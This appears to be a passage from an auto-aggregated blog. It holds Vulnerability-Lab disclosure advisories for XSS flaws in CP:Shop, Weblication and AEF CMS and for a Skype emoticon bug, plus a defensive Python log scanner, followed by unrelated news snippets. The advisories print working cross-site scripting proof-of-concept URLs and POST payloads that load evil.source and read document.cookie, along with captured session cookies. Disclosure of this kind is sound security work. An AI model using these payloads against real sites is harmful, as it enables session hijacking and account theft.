5. Move back into the windows 10 client and send the mobile skype client 2 kiss smilies for example
6. Close the skype client and reopen the client
7. Now the smilies graphics are glitching inside by a resize of the image (view demo video)
8. Now the message with the smilies must be quoted or copied and then transferred to any other skype input field where smilies are supported
9. Pasting around 50 of them results in unexpected memory errors and uncaught exceptions or access violations
Note: Tested for Android Samsung and Apple iOS. The resize of the larger image results in a memory corruption
10. Successful reproduction of the vulnerability!

PoC Video: Shows the local issue and the remote triggered bug ...
https://www.youtube.com/watch?v=2vcdQb98zE0

Solution - Fix & Patch:
=======================
Secure memory allocation when resizing emoticons images during rendering in transfers through the skype mobile software client. Microsoft resolved the vulnerability and prepared an updated version v8.17 & v8.18. In both versions the security issue is known as patched.

Security Risk:
==============
The security risk of the vulnerability in the skype mobile software client for ios and android is estimated as medium (cvss 4.7).

Credits & Authors:
==================
Benjamin Kunz Mejri [research@vulnerability-lab.com] - https://ift.tt/2CTH1QS.

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains: https://ift.tt/1jnqRwA - www.vuln-lab.com - www.evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to ask for permission.

Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source: Gmail -> IFTTT-> Blogger

[FD] Sandoba CP:Shop CMS v2016.1 - Multiple Cross Site Scripting Vulnerabilities

Document Title:
===============
Sandoba CP:Shop CMS v2016.1 - Multiple Cross Site Scripting Vulnerabilities

References (Source):
====================
https://ift.tt/2FL7GRk

Release Date:
=============
2018-03-02

Vulnerability Laboratory ID (VL-ID):
====================================
2122

Common Vulnerability Scoring System:
====================================
3.4

Vulnerability Class:
====================
Cross Site Scripting - Non Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
CP:Shop is the basis for your lasting success on the Internet. The system was designed so that customers are optimally supplied with information about articles, special promotions and discounts on the one hand, while the shop operator is at the same time subjected to essential work steps through automation.

(Copy of the homepage: https://ift.tt/2Gda3M5)

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple non-persistent cross site vulnerabilities in the official Sandoba CP:Shop v2016.1 CMS.

Vulnerability Disclosure Timeline:
==================================
2018-03-02: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Pre auth - no privileges

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Independent Security Research

Technical Details & Description:
================================
Non-persistent cross site scripting vulnerabilities have been discovered in the official Sandoba CP:Shop v2016.1 Content Management System. The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise browser to web-application requests.

The security vulnerability is located in the `admin.php` files of the `./cpshop/` module. Remote attackers are able to inject own script codes to the client-side requested vulnerable web-application parameters. The attack vector of the vulnerability is non-persistent and the request method to inject/execute is GET. The vulnerabilities are classic client-side cross site scripting vulnerabilities.

Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious source and non-persistent manipulation of affected or connected application modules.

Request Method(s):
[+] GET

Vulnerable File(s):
[+] admin.php

Vulnerable Parameter(s):
[+] path
[+] search
[+] rename
[+] dir

Proof of Concept (PoC):
=======================
The web vulnerabilities can be exploited by remote attackers without privileged user account and with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Exploitation
https://cpshop.localhost:8080/cpshop/admin.php#!file=files&mode=rename_dir&form[dir]=fancybox&form[path]=
%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E

https://ift.tt/2GARHs1
%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert%28document.cookie%29%3E&form%5Bvar%5D=1&form%5Bposter%5D=0&form%5Bcategory%5D=0&file=news

http://cpshop.localhost:8080/cpshop/admin.php?form[search]=https://www.test.de#!file=files&mode=rename_dir&form[dir]=
%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&form[path]=.

http://cpshop.localhost:8080/cpshop/admin.php?form[search]=https://www.test.de#!file=files&mode=rename_dir&form[dir]=TEST&form[path]=
%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E

https://ift.tt/2GeTfUN
%22%3E%22%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&select_box=2

https://cpshop.localhost:8080/cpshop/admin.php#!file=files&mode=rename_dir&form[dir]=
de%3E%22%3Ciframe%20src=evil.source%3E&form[path]=modules%2Ffast_gallery%2Flanguages

PoC: Session Logs
Status: 200[OK]
GET https://cpshop.localhost:8080admin.php?file=files&mode=rename_dir&form[dir]=fancybox&form[path]=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&cleanajax=yes
Mime Type[text/html]
   Request Header:
      Host[cpshop.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0]
      Accept[*/*]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate, br]
      X-Requested-With[XMLHttpRequest]
      Referer[https://cpshop.localhost:8080admin.php]
      Cookie[shop_userkey=afb404c7622db6ced7a120e8e4e24505; log_data=DEMOADMINSHOP; PHPSESSID=03f32863066e90b45f109d7b1d5a0b5e; language=de; cookieconsent_dismissed=yes]
      Connection[keep-alive]
   Response Header:
      server[Apache/2.4.27]
      x-powered-by[PHP/7.0.20]
      expires[Thu, 19 Nov 1981 08:52:00 GMT]
      cache-control[no-store, no-cache, must-revalidate]
      pragma[no-cache]
      x-frame-options[SAMEORIGIN]
      content-encoding[gzip]
      set-cookie[language=de; expires=Tue, 20-Feb-2018 13:00:40 GMT; Max-Age=259200; path=/]
      content-type[text/html; charset=utf-8]
      X-Firefox-Spdy[h2]
-
Status: 302[Found]
GET https://ift.tt/2Gw0tqV
Mime Type[text/html]
   Request Header:
      Host[cpshop.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate, br]
      Referer[https://cpshop.localhost:8080admin.php]
      Cookie[shop_userkey=afb404c7622db6ced7a120e8e4e24505; log_data=DEMOADMINSHOP; PHPSESSID=03f32863066e90b45f109d7b1d5a0b5e; language=de; cookieconsent_dismissed=yes]
      Connection[keep-alive]
      Upgrade-Insecure-Requests[1]
   Response Header:
      server[Apache/2.4.27]
      location[https://ift.tt/2GdPiQh]
      content-length[296]
      content-type[text/html; charset=iso-8859-1]
      X-Firefox-Spdy[h2]
-
Status: pending[]
GET https://ift.tt/2GARKEd http%3A%2F%2Fcpshop.localhost:8080%2Fcpshop%2Fadmin.php%3Fform%255Bsearch%255D%3D%2522%253E%253Ciframe%2Bsrc%253Devil.source%2B onl&form%5Bvar%5D=1&form%5Bposter%5D=0&form%5Bcategory%5D=0&file=news
Mime Type[unknown]
   Request Header:
      Host[cpshop.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0]
      Accept[*/*]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      X-Requested-With[XMLHttpRequest]
      Referer[https://ift.tt/2DZ1Bya]
      Cookie[log_data=DEMOADMINCMS; PHPSESSID=aa820d024a8b72f3a57e12e72cc63bb6; language=de]
      DNT[1]
-
14:06:37.847[179ms][total 538ms]
Status: 200[OK]
GET https://ift.tt/2Gw0xXH
Mime Type[text/html]
   Request Header:
      Host[cpshop.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://ift.tt/2DZ1Bya]
      Cookie[log_data=DEMOADMINCMS; PHPSESSID=aa820d024a8b72f3a57e12e72cc63bb6; language=de]
      Connection[keep-alive]
      Upgrade-Insecure-Requests[1]
   Response Header:
      Server[Apache/2.4.27]
      X-Powered-By[PHP/7.0.20]
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Cache-Control[no-store, no-cache, must-revalidate]
      Pragma[no-cache]
      X-Frame-Options[SAMEORIGIN]
      Content-Encoding[gzip]
      Set-Cookie[language=de; expires=Tue, 20-Feb-2018 13:06:37 GMT; Max-Age=259200; path=/]
      Upgrade[h2c]
      Connection[Upgrade, Keep-Alive]
      Keep-Alive[timeout=5, max=100]
      Transfer-Encoding[chunked]
      Content-Type[text/html; charset=utf-8]

Reference(s):
https://ift.tt/2GARHs1
https://ift.tt/2GeTfUN
https://cpshop.localhost:8080/cpshop/admin.php#!file=files&mode=rename_dir&form[dir]=fancybox&form[path]=
http://cpshop.localhost:8080/cpshop/admin.php?form[search]=https://www.test.de#!file=files&mode=rename_dir&form[dir]=
https://cpshop.localhost:8080/cpshop/admin.php#!file=files&mode=rename_dir&form[dir]=

Solution - Fix & Patch:
=======================
The cross site vulnerabilities can be resolved by implementation of htmlentities and a secure input restriction of characters.

Security Risk:
==============
The security risk of the client-side cross site scripting web vulnerabilities in the web-application is estimated as medium (cvss 3.4).

Credits & Authors:
==================
Vulnerability-Lab [research@vulnerability-lab.com] - https://ift.tt/2oPgBXC

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals.

Source: Gmail -> IFTTT-> Blogger
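
For the CP:Shop advisory above, one way to look for the reported request pattern in web server access logs. This is an added example, not part of the advisory or the product: the log lines are constructed from the advisory's session log, the client addresses are documentation ranges, and the `url` parameter carrying the nested, double-encoded request is an assumption.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Parameters the advisory lists as vulnerable; they arrive as form[<name>].
WATCHED = {"path", "search", "rename", "dir"}
# Characters/constructs that have no business in a directory name or path.
MARKUP = re.compile(r'[<>"]|\bon\w+\s*=|javascript:', re.I)
REQUEST = re.compile(
    r'^(?P<client>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
FORM_KEY = re.compile(r"form\[(\w+)\]")


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly; the advisory's log shows %255B / %2522,
    i.e. values that were encoded twice."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_target(target, depth=0):
    """Return [(parameter, decoded_value)] for watched admin.php parameters
    whose decoded value contains markup. Follows one level of admin.php
    URLs nested inside another parameter."""
    try:
        parts = urlsplit(target)
    except ValueError:
        return []
    hits = []
    on_admin = parts.path.endswith("admin.php")
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        decoded = fully_decode(value)
        match = FORM_KEY.fullmatch(fully_decode(key))
        if on_admin and match and match.group(1) in WATCHED \
                and MARKUP.search(decoded):
            hits.append((match.group(1), decoded))
        elif depth < 2 and "admin.php?" in decoded:
            hits.extend(scan_target(decoded, depth + 1))
    return hits


def scan_log(lines):
    """Return [(client, parameter, decoded_value)] over access-log lines."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        for param, value in scan_target(m.group("target")):
            findings.append((m.group("client"), param, value))
    return findings


# Constructed sample (combined log format), built from the advisory's requests.
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Feb/2018:14:00:40 +0100] "GET /cpshop/admin.php?file=files'
    '&mode=rename_dir&form[dir]=fancybox&form[path]=%22%3E%3Ciframe%20src=evil.source'
    '%20onload=alert(document.cookie)%3E&cleanajax=yes HTTP/1.1" 200 512',
    '203.0.113.7 - - [20/Feb/2018:14:01:02 +0100] "GET /cpshop/admin.php?file=files'
    '&mode=rename_dir&form[dir]=fancybox&form[path]=modules%2Ffast_gallery%2Flanguages'
    ' HTTP/1.1" 200 498',
    '203.0.113.7 - - [20/Feb/2018:14:06:37 +0100] "GET /cpshop/admin.php?form%5Bsearch'
    '%5D=%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert%28document.cookie%29%3E'
    '&form%5Bvar%5D=1&form%5Bposter%5D=0&form%5Bcategory%5D=0&file=news HTTP/1.1" 200 733',
    '198.51.100.23 - - [20/Feb/2018:14:06:38 +0100] "GET /cpshop/index.php?url=http%3A'
    '%2F%2Fcpshop.localhost:8080%2Fcpshop%2Fadmin.php%3Fform%255Bsearch%255D%3D%2522'
    '%253E%253Ciframe%2Bsrc%253Devil.source%2Bonl HTTP/1.1" 200 1024',
    '198.51.100.23 - - [20/Feb/2018:14:07:10 +0100] "GET /cpshop/admin.php?form[search]'
    '=https://www.test.de HTTP/1.1" 200 610',
]

if __name__ == "__main__":
    for client, param, value in scan_log(SAMPLE_LOG):
        print(f"{client} form[{param}] -> {value!r}")
```

The `#!...` part of the advisory's PoC links is a URL fragment and never reaches the server; only the resulting `admin.php?...` request, as in the advisory's session log, appears in access logs.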

[FD] Weblication CMS Core & Grid v12.6.24 - Multiple Cross Site Scripting Vulnerabilities

Document Title:
===============
Weblication CMS Core & Grid v12.6.24 - Multiple Cross Site Scripting Vulnerabilities

References (Source):
====================
https://ift.tt/2EI1dt1

Release Date:
=============
2018-02-21

Vulnerability Laboratory ID (VL-ID):
====================================
2121

Common Vulnerability Scoring System:
====================================
3.5

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
https://ift.tt/2IYH6p4

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site vulnerability in the official Weblication CMS Core & Grid v12.006.024 CMS.

Vulnerability Disclosure Timeline:
==================================
2018-02-21: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Independent Security Research

Technical Details & Description:
================================
A persistent cross site scripting vulnerability has been discovered in the official Weblication CMS Core & Grid v12.006.024 CMS. The vulnerability allows remote attackers to inject own malicious script codes to the application-side of the service to compromise sensitive user data or affected web-application contents.

The security vulnerability is located in the `wFilemanager.php` & `index.php` files of the `/grid5/scripts/` modules. The injection point is located in the Project `Title` and the execution point occurs in the `Inhaltsprojekte` output listing section. Remote attackers with privileged user accounts are able to inject own malicious script code with persistent attack vector to compromise user session credentials or to manipulate the affected web-application module output context.

The request method to inject is POST and the attack vector is reflected. The injection point is located in the project Title and the execution point occurs in the Inhaltsprojekte output listing section.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected or connected application modules.

Request Method(s):
[+] POST

Vulnerable File(s):
[+] index.php
[+] wFilemanager.php

Vulnerable Input Field(s):
[+] Title

Affected Module(s):
[+] Inhaltsprojekte

Proof of Concept (PoC):
=======================
The persistent vulnerability can be exploited by remote attackers with low privilege web-application user account and low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC Inject: Title
https://ift.tt/2uo7cOR

PoC Execute: Inhaltsprojekte
https://ift.tt/2IYNQDq default.wVariables.php&target=be&selectedTab=&display=&action=startedit&referrer=%2Fde%2Findex.php&redirectEndEdit=&showFileOptions=&anchor=

PoC: Payload
">

PoC: Vulnerable Source
Projektbasis
Projekt basiert auf 
base_source
Zusätzliche Weblics Quellen 
base_sources_additional
z.B. password@http://IHREDOMAIN/vorlageprojekt
Inhaltsprojekte
 
/de Inhalte
/img-src-x-img-img-src-x-img- ">
Neben den globalen Projekteinstellungen können Sie weitere Einstellungen in den jeweiligen Inhalts- bzw. Sprachprojekten vornehmen.
Logo
Logo

PoC: Session Logs
Status: 200[OK]
POST https://ift.tt/2uo7cOR
Mime Type[text/html]
   Request Header:
      Host[grid.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Content-Type[application/x-www-form-urlencoded]
      Content-Length[596]
      Referer[https://ift.tt/2uo7cOR]
      Cookie[WSESSIONID=2a3af57351f0a4ea3cbdd39ac5763954; wCc=1; lastCheckUpdate=1518869664242; lastVersion=012.006.024.000]
      Connection[keep-alive]
      Upgrade-Insecure-Requests[1]
   POST-Daten:
      action[editOptionsProject]
      path[%2Fimg-src-x-img-img-src-x-img-]
      title[%22%3E%3Ciframe+src%3D%22evil.source%22+onload%3Dalert%28document.domain%29%3E%2520% 22%3E%3Ciframe+src%3D%22evil.source%22+onload%3Dalert%28document.cookie%29%3E]
      pathProjectGlobal[%2Fdefault-wGlobal]
      pathProjectLayout[]
      language[br]
      projectConnect[%2Fimg-src-x-img-img-src-x-img-]
      hostOnly[]
      pageOffline[%2Fimg-src-x-img-img-src-x-img-%2FwGlobal%2Fcontent%2Ferrordocs%2Foffline.php]
      permissionDenied[%2Fimg-src-x-img-img-src-x-img-%2FwGlobal%2Fcontent%2Ferrordocs%2Fpermission-denied.php]
      W_PRETMP_groups%5B%5D[%5BW_ID%5D]
      backupGroup[]
   Response Header:
      Server[Apache/2.4.27]
      X-Powered-By[PHP/7.0.20]
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Cache-Control[no-store, no-cache, must-revalidate]
      Vary[Accept-Encoding]
      Keep-Alive[timeout=5, max=100]
      Connection[Keep-Alive]
      Transfer-Encoding[chunked]
      Content-Type[text/html; charset=UTF-8]
-
Status: 200[OK]
GET https://ift.tt/2uo7cOR
Mime Type[text/html]
   Request Header:
      Host[grid.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Referer[https://ift.tt/2uq4uZi wGlobal/content/variables/default.wVariables.php&target=be&referrer=/de/index.php&display=default&editsource=&hasPlaceholdersToInsert=0]
      Cookie[WSESSIONID=2a3af57351f0a4ea3cbdd39ac5763954; wCc=1; lastCheckUpdate=1518869664242; lastVersion=012.006.024.000]
      Connection[keep-alive]
      Upgrade-Insecure-Requests[1]
   Response Header:
      Server[Apache/2.4.27]
      X-Powered-By[PHP/7.0.20]
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Cache-Control[no-store, no-cache, must-revalidate]
      Pragma[no-cache]
      Content-Encoding[gzip]
      Vary[Accept-Encoding]
      Keep-Alive[timeout=5, max=97]
      Connection[Keep-Alive]
      Transfer-Encoding[chunked]
      Content-Type[text/html; charset=UTF-8]
-
Status: 200[OK]
GET https://ift.tt/2IYNTz6
Mime Type[text/html]
   Request Header:
      Host[grid.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Referer[https://ift.tt/2uo7cOR]
      Cookie[WSESSIONID=2a3af57351f0a4ea3cbdd39ac5763954; wCc=1; lastCheckUpdate=1518869664242; lastVersion=012.006.024.000]
      Connection[keep-alive]
      Upgrade-Insecure-Requests[1]
   Response Header:
      Server[Apache/2.4.27]
      X-Powered-By[PHP/7.0.20]
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Cache-Control[no-store, no-cache, must-revalidate]
      Pragma[no-cache]
      Keep-Alive[timeout=5, max=96]
      Connection[Keep-Alive]
      Transfer-Encoding[chunked]
      Content-Type[text/html; charset=UTF-8]

Reference(s):
https://ift.tt/2uo7fdv
https://ift.tt/2IYH9Bg
https://ift.tt/2uo7jdf
https://ift.tt/2IYNVqI
https://ift.tt/2ur54WN

Solution - Fix & Patch:
=======================
The vulnerability can be resolved by a sanitize of the delivered input through the wFilemanager.php file. Parse in the output location the execution point in the Inhaltsprojekte to resolve the issue.

Security Risk:
==============
The security risk of the persistent cross site scripting vulnerability in the web-application is estimated as medium (cvss 3.5).

Credits & Authors:
==================
Benjamin K.M. [research@vulnerability-lab.com] - https://ift.tt/2CTH1QS.

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty.

Source: Gmail -> IFTTT-> Blogger

[FD] AEF CMS v1.0.9 - (PM) Persistent Cross Site Scripting Vulnerability

Document Title: =============== AEF CMS v1.0.9 - (PM) Persistent Cross Site Scripting Vulnerability References (Source): ==================== https://ift.tt/2EEzMA9 Release Date: ============= 2018-02-18 Vulnerability Laboratory ID (VL-ID): ==================================== 2123 Common Vulnerability Scoring System: ==================================== 4.4 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 1.000€ - 2.000€ Product & Service Introduction: =============================== AEFs full name is Advanced Electron Forum. This bulletin board software is free software. It is written in PHP and MySQL. AEF has a very simple and easy to use Administration Panel and installing this software is a piece of cake! You can install new themes, customize themes the way you want. The User Control Panel has a simple yet beautiful interface where users can set their preferences for the board. This Bulletin board or forum software has all the general features that a forum software should have. (Copy of the Homepage: https://ift.tt/2DYhWTT & https://ift.tt/qN8PnN) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a persistent web vulnerability in the official Advanced Electron Forum v1.0.9 CMS. 
Vulnerability Disclosure Timeline: ================================== 2018-02-20: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted authentication (user/moderator) - User privileges User Interaction: ================= Low User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ A persistent cross site scripting vulnerability has been discovered in the official Advanced Electron Forums v1.0.9 Content Management System. The vulnerability allows remote attackers to inject own malicious script code with persistent attack vector to the application-side of the service. The persistent cross site vulnerability is located in the `FTP Link` element of the `Private Message` module. The editor of the private message module allows to insert links without sanitizing the content. Thus allows remote attackers to inject malicious script code payloads as private message to compromise user credentials or to persistent manipulate the affected modules context. The injection point is the editor ftp link element and the execution point occurs in the message body context on arrival. The request method to inject is post with restricted user privileges and the attack vector is located on the application-side. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected or connected application modules. 
Request Method(s): [+] POST Vulnerable Module(s): [+] Private Messages Vulnerable Input(s): [+] Ftp Link (Editor Element) Proof of Concept (PoC): ======================= The cross site scripting web vulnerability can be exploited by low privileged user accounts with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open the web-application and login as user 2. Move to the private message module 3. Open up the editor by composing a message 4. add some short text, save the entry as draft 5. Open the draft and insert a ftp link with a script code payload 6. Save the entry and deliver the message to another test user Note: The message only needs to be watched to execute on arrival 7. The test user opens the private message module and the persistent script code executes in the message body context 8. Successful reproduce of the persistent vulnerability! 
PoC: Payload (Ftplink) %0D%0A%0D%0A or %0D%0A%0D%0A%0D%0A%0D%0A+ PoC: Vulnerable Source PoC: Session Logs (Send Private Message) Status: 200[OK] POST https://ift.tt/2DYQs04 Mime Type[text/html] Request Header: Host[aeforums.localhost:8000] User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Content-Type[application/x-www-form-urlencoded] Content-Length[174] Referer[https://ift.tt/2DYQs04] Cookie[AEFCookies1526[aefsid]=jmik0sqtslneqffjl537i931brqh3tzr; AEFCookies8381[aefsid]=x1m0rs9lhcl6hl3tbq7qbdh9jn0xsnsf] Connection[keep-alive] Upgrade-Insecure-Requests[1] POST-Daten: pmrecipients[admin] pmsubject[test] pmbody[This+is+a+private+test+message+with+payload+in+the+ftp+link%0D%0A%0D%0A] postcode[yerudyyk4joz8ea5] pmsaveinsentitems[on] sendpm[Send+PM] Response Header: Server[Apache] X-Powered-By[PHP/5.4.45] Content-Length[217] Content-Type[text/html; charset=ISO-8859-1] - Status: 200[OK] GET https://ift.tt/2GwtdQg Mime Type[text/html] Request Header: Host[aeforums.localhost:8000] User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Referer[https://ift.tt/2DYQs04] Cookie[AEFCookies1526[aefsid]=jmik0sqtslneqffjl537i931brqh3tzr; AEFCookies8381[aefsid]=x1m0rs9lhcl6hl3tbq7qbdh9jn0xsnsf] Connection[keep-alive] Upgrade-Insecure-Requests[1] Response Header: Server[Apache] Accept-Ranges[bytes] Content-Length[431] Content-Type[text/html; charset=UTF-8] Reference(s): https://ift.tt/2DZj9ds https://ift.tt/2GvVCpY Solution - Fix & Patch: ======================= The security vulnerability can be patched by a sanitize of the ftp link element input field in the private message module. Parse in the editor the output location for the link to prevent the execution point of the issue. 

Security Risk:
==============
The security risk of the persistent cross site scripting web vulnerability in the open-source web-application is estimated as medium (cvss 4.4).


Credits & Authors:
==================
Benjamin K.M. [research@vulnerability-lab.com] - https://ift.tt/2CTH1QS.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.

Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source: Gmail -> IFTTT-> Blogger

Monday, March 26, 2018

Ravens president Dick Cass wants to repair "disconnect" in relationship with the fans (ESPN)

from ESPN https://ift.tt/17lH5T2
via IFTTT

Leader of Hacking Group Who Stole $1 Billion From Banks Arrested In Spain

Spanish Police has arrested the alleged leader of an organised Russian cybercrime gang behind the Carbanak and Cobalt malware attacks, which stole over a billion euros from banks worldwide since 2013. In a coordinated operation with law enforcement agencies across the globe, including the FBI and Europol, Police detained the suspected leader of Carbanak hacking group in Alicante, Spain.


from The Hacker News https://ift.tt/2IWAQxM
via IFTTT

Anonymous 'Solo' Actor Dishes On Production, Calls Alden Ehrenrich 'Not Good Enough,'

We only have two months until the release of "Solo: A Star Wars Story," but yet, the drama continues, with an anonymous actor speaking out.

from Google Alert - anonymous https://ift.tt/2pI1iTb
via IFTTT

2018 MLB Goals For All 30 Teams: What the Orioles must accomplish this season - Sam Miller (ESPN)

from ESPN https://ift.tt/1eW1vUH
via IFTTT

Ravens need to prioritize acquiring WR Cameron Meredith from the Bears - Jamison Hensley (ESPN)

from ESPN https://ift.tt/17lH5T2
via IFTTT

An interview with David Austin: 1st place and $25,000 in Kaggle’s most popular image classification competition

In today’s blog post, I interview David Austin, who, with his teammate, Weimin Wang, took home 1st place (and $25,000) in Kaggle’s Iceberg Classifier Challenge.

David and Weimin’s winning solution can be practically used to allow safer navigation for ships and boats across hazardous waters, resulting in less damage to ships and cargo and, most importantly, fewer accidents, injuries, and deaths.

According to Kaggle, the Iceberg image classification challenge:

  1. Was the most popular image classification challenge they’ve ever had (measured in terms of competing teams)
